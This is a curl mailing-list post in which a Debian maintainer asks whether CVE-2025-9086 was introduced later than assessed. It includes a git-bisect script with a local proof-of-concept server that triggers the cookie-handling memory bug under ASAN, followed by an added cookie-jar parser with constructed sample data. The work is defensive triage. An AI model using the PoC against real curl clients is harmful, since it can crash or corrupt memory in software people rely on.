CVE-2025-9086 introduced later than originally assessed?
From: Samuel Henrique via curl-library <curl-library_at_lists.haxx.se>
Date: Sun, 4 Jan 2026 22:37:25 -0800
Hello curl friends,
I was investigating CVE-2025-9086 for Debian, trying to run the POC against our
older releases together with Alex and could not run it against 7.88.1, even
though it was supposedly introduced in 7.31.0 as per
https://curl.se/docs/CVE-2025-9086.html.
Running a git bisect on the upstream project [0], I've landed on the following
commit as introducing the ASAN failure:
https://github.com/curl/curl/commit/1aea05a6c2699e80c75936d58569851555acd603
I understand not triggering the ASAN finding doesn't necessarily mean the
issue didn't exist, so I wanted to ask for upstream help here: do you believe
that could be the correct breaking commit, rather than
https://github.com/curl/curl/commit/f24dc09d209a2f91ca38d?
I'm cc'ing Alex, who backported the fix for Debian and who noticed the POC
didn't run for our older releases, and also Charles, who helped us release an
advisory for one of the older Debian releases (we might have released an
advisory which wasn't needed).
The bisect script I used is at the bottom of this email [0], but note that in
order to run it, you will need to map your hostname to 127.0.0.1 in /etc/hosts
if it's not already there.
Cheers,
[0]
```bash
#!/bin/bash
# git bisect run script: exit 125 = commit cannot be tested (skip),
# exit 1 = bad (ASAN fired), exit 0 = good.

untestable() {
    git_clean
    exit 125
}

fail() {
    git_clean
    exit 1
}

git_clean() {
    git reset --hard
    git clean -d -x -f > /dev/null
    set +x
}

set -x

# Build the checked-out commit with AddressSanitizer.
autoreconf -i
export CFLAGS="-fsanitize=address -g -fno-omit-frame-pointer -O1"
export LDFLAGS="-fsanitize=address"
export LIBS="-lasan"
./configure --with-nghttp2 \
    --with-openssl \
    --with-ca-path=/etc/ssl/certs \
    --with-ca-bundle=/etc/ssl/certs/ca-certificates.crt \
    --prefix="$HOME/curl/install" \
    --includedir=/usr/include/x86_64-linux-gnu \
    || untestable
make -j || untestable

# Throwaway self-signed certificate for the local HTTPS server.
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 1 -nodes \
    -subj "/C=XX/ST=StateName/L=CityName/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname"

# PoC: an HTTPS server that sets a Secure cookie and redirects to a plain-HTTP
# server on the same host, which sets another cookie with a different path.
cat << 'EOF' > server.py
#! /usr/bin/python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import socket
import ssl
import threading
import time


class HTTPSRequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header("Set-Cookie", "A=B; path=/; Secure")
        self.send_header("Location", f"http://{socket.gethostname()}:9080")
        self.end_headers()


class HTTPRequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Set-Cookie", "A=C; path=/foo/")
        self.end_headers()
        self.wfile.write(b"A" * 128)


def run_https_server():
    httpd = HTTPServer(('', 9443), HTTPSRequestHandler)
    ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    ctx.load_cert_chain(certfile='./cert.pem', keyfile="./key.pem")
    httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    httpd.serve_forever()


def run_http_server():
    httpd = HTTPServer(('', 9080), HTTPRequestHandler)
    httpd.serve_forever()


if __name__ == "__main__":
    https_thread = threading.Thread(target=run_https_server)
    http_thread = threading.Thread(target=run_http_server)
    https_thread.start()
    http_thread.start()
    while True:
        time.sleep(1)
EOF

python3 server.py &
SERVER_PID=$!
sleep 1

# Make an ASAN report distinguishable from any ordinary curl exit code.
export ASAN_OPTIONS=exitcode=42
./src/curl --insecure -c cookies -vv -L "https://${HOSTNAME}:9443"
CURL_EXIT_CODE="$?"
kill "$SERVER_PID"
echo "CURL EXIT CODE: $CURL_EXIT_CODE"
if [ "$CURL_EXIT_CODE" -eq 42 ]; then
    fail
fi

# If we got here, success.
set +x
git reset --hard
exit 0
```
-- 
Samuel Henrique <samueloph>

Received on 2026-01-05
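The bisect script above writes curl's cookie jar to `cookies` (the `-c cookies` flag). On a commit where the ASAN check does not fire, that file is the record of which cookies curl actually stored after following the redirect chain, which helps tell "the PoC did not trigger" apart from "the PoC did not exercise the cookie path at all". The helper below parses that Netscape-format jar. It is an added example, not code from the post or from the curl project, and the sample jar content is constructed to look like what the PoC might produce (hostname `myhost` and the `session` cookie are made up).

```python
"""Parse a curl cookie jar (Netscape cookie file format).

Added example, not from the original mailing-list post. The jar text below is
constructed for illustration; it is not captured output from the PoC.
"""
from dataclasses import dataclass
from typing import List

# Constructed sample jar. Fields are tab-separated:
# domain, include_subdomains, path, secure, expires (unix time, 0 = session), name, value.
# curl prefixes HttpOnly cookies with "#HttpOnly_" so that naive readers skip them as comments.
SAMPLE_JAR = """# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

myhost\tFALSE\t/\tTRUE\t0\tA\tB
myhost\tFALSE\t/foo/\tFALSE\t0\tA\tC
#HttpOnly_myhost\tFALSE\t/\tFALSE\t0\tsession\tabc123
"""

HTTPONLY_PREFIX = "#HttpOnly_"


@dataclass
class Cookie:
    domain: str
    include_subdomains: bool
    path: str
    secure: bool
    expires: int  # unix timestamp; 0 means a session cookie
    name: str
    value: str
    http_only: bool


def parse_cookie_jar(text: str) -> List[Cookie]:
    """Return every cookie in a Netscape-format jar, HttpOnly entries included."""
    cookies: List[Cookie] = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.rstrip("\r\n")
        if not line.strip():
            continue
        http_only = False
        if line.startswith(HTTPONLY_PREFIX):
            # HttpOnly cookies are real entries hidden behind a comment marker.
            http_only = True
            line = line[len(HTTPONLY_PREFIX):]
        elif line.startswith("#"):
            continue  # genuine comment line
        fields = line.split("\t")
        if len(fields) != 7:
            raise ValueError(
                f"line {lineno}: expected 7 tab-separated fields, got {len(fields)}"
            )
        domain, subdomains, path, secure, expires, name, value = fields
        cookies.append(
            Cookie(
                domain=domain,
                include_subdomains=(subdomains == "TRUE"),
                path=path,
                secure=(secure == "TRUE"),
                expires=int(expires),
                name=name,
                value=value,
                http_only=http_only,
            )
        )
    return cookies


def cookies_named(cookies: List[Cookie], name: str) -> List[Cookie]:
    """All stored cookies with a given name, in file order (one per distinct path)."""
    return [c for c in cookies if c.name == name]


if __name__ == "__main__":
    for c in parse_cookie_jar(SAMPLE_JAR):
        flags = ("secure " if c.secure else "") + ("httponly" if c.http_only else "")
        print(f"{c.domain} {c.path:<6} {c.name}={c.value} {flags}".rstrip())
```

Run it against the real file with `parse_cookie_jar(open("cookies").read())`. One caveat: curl writes the jar during its normal cleanup at exit, so on a commit where ASAN aborts the process the file is either missing or left over from a previous run; the jar is only informative on the no-crash path.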